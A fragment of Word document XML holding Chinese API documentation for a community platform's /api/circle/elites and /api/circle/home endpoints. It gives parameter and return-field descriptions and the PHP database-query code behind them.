      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E55F0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20719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75D4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58DC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098A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/api/circle/elites </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取名人堂列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690AF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获取名人堂列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DDC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4F402D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C2507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63917E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBE1B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per_page      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每页显示数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B40C7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名人堂用户列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F364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total       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>总记录数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014C64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per_page    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每页显示数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC18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current_page </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前页码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2377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           </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>数据集合</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BB75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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A497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nickname     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户昵称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034CD8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user         </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360D74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mobile       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户手机号码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D37B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img          </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户头像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECCD6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article_num </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335C2F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follow_num  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>关注人数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728EC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当前登录用户已关注该用户（</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6AEF0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6EA762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2670FA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3F60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elites()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35557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81A7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4B047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8);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F069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 = Db::name('member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7310E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-&gt;field('id, nickname, user, mobile, img')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7FA0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-&gt;where('is_elite', 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A43C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343042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3A66E1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-&gt;toArray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D79E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(count($elites['data']) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F05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($elites['data'] as $key =&gt; $elite) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309047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$elites['data'][$key]['article_num'] = Db::name('circle_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1002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$elite['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434DF7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11DA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$elites['data'][$key]['article_num'] += Db::name('article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DAD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$elite['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB910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FB4CE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$elites['data'][$key]['follow_num'] = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666B3F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$elite['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5D2B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005DD6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$elites['data'][$key]['img'] = $elite['img'] ? _imgUrl() . $elite['img'] : '/public/style/index/member/img/userimg.gif';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFFE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$elites['data'][$key]['follow'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3650E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A0074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 = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E94DA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0F9FF8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$elite['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070E87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36A2F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 &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB3E6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$elites['data'][$key]['follow'] = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F98D0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8D4F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2E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ED0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7DBE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$elites = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6524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3780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json($elites);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D56DF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DA1B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6F6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/api/circle/home </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户社区首页（我的社区</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区动态列表分页展示</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> + 2</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>条评论）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AB4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用户社区首页（我的社区</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区动态列表分页展示</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> + 2</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>条评论）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64059A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4603BB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83DB3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121E51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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302608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per_page      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每页显示数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2205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返回数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3F8C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circles           </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>我的社区列表（</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>条记录）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33035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articles          </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区动态列表（分页展示</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> + 2</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>条评论）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228E6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total           </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>总记录数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B951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per_page        </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每页显示数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E19E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current_page    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前页码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14822C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data              </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>数据集合</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EDB1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data.circles      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区数据集合</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D08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data.circles.img           </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>logo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8772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data.circles.title         </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区标题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4637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data.circles.content       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C27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data.circles.article_num  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区动态数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685A78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{Integer} data.circles.follower_num </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区关注人数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D88F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data.articles     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区动态数据集合</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C11DB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data.articles.image_urls  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>多图</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>集合</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741AEB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data.articles.zan_num   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态获得点赞次数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BB8D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data.articles.cai_num   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态获得点踩次数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011F4F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data.articles.ping_num  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态评论数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2931B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data.articles.share_num </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态分享次数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73623F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data.articles.is_top    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态是否置顶：</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1B252A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data.articles.is_selected </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态是否加精：</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7BD9D8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data.articles.author_username      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态作者昵称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F54F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data.articles.author_img           </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态作者头像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29577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data.articles.author_follow_num   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态作者关注数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B90C9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data.articles.author_article_num  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态作者发表文章数目</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C934A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data.articles.zan       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前用户是否点赞该动态：</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599EE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data.articles.follow    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前用户是否关注该动态作者：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F80EF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data.articles.circle       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态所属社区信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5076DE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data.articles.circle.title </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态所属社区名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B548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data.articles.circle.img   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态所属社区头像</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751460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data.articles.circle.article_num   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态所属社区动态数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C802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data.articles.circle.follower_num  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态所属社区关注人数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7920FB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data.articles.circle.follow   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前用户是否该动态所属社区：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01687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data.articles.pings                      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态的两条评论</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206443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data.articles.pings.*.author_username  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>该评论作者昵称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4182F4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data.articles.pings.*.author_img       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>该评论作者头像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D921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EEAE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home()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429B53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F06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3083D8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8);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1542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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B725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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641AC7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$followed_circle_ids = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726D1F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F541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$followed_circles = Db::name('circle_member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377D9D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-&gt;field('circle_id')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690382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46A85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42E5B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19F7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(count($followed_circles)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA9C3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($followed_circles as $followed_circle) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BD7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$followed_circle_ids[] = $followed_circle['circle_id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9AD1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6809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3A32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(count($followed_circle_ids) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAB9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1DEB17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'in', $followed_circle_ids)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF4FB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77683D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-&gt;limit(4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751676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9C14E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FBE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79E4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(count($circles) == 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D385E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2695D5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-&gt;order('des', 'desc')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1D9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-&gt;limit(4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540A4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2A0999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6255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(count($circles) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506BE3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($circles as $key =&gt; $circle) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F3C7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$followed_circle_ids[] = $circle['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0437FF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$circles[$key]['img'] = $circle['img'] ? _imgUrl() . $circle['img'] : '/public/style/index/member/img/default_circle_logo_52x52.png';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73504C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$circles[$key]['des'] = is_null($circle['des']) ? 0 : $circle['des'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA2F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$circles[$key]['hide'] = is_null($circle['hide']) ? 0 : $circle['hide'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EFBC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$article_num = Db::name('circle_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702427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$circle['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3618E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4F56F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$circles[$key]['article_num'] = $article_num;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BF98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$follower_num = Db::name('circle_member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4D88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$circle['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6C71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475652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5B695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$circles[$key]['follower_num'] = $follower_num;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5897CA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($article_num != $circle['article_num'] || $follower_num != $circle['follower_num']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52354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Db::name('circle')-&gt;where('id', $circle['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614B72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26799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'article_num' =&gt; $article_num,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229BF9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'follower_num' =&gt; $follower_num,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BFF1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9CDB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AEE9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4CF0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5AEC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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D93B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371EA5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2DAF8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D9DE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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0147BC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3821AE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7F2C81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6880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1B29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(count($followed_circle_ids) &gt; 0) {</w:t>
      </w:r>
    </w:p>
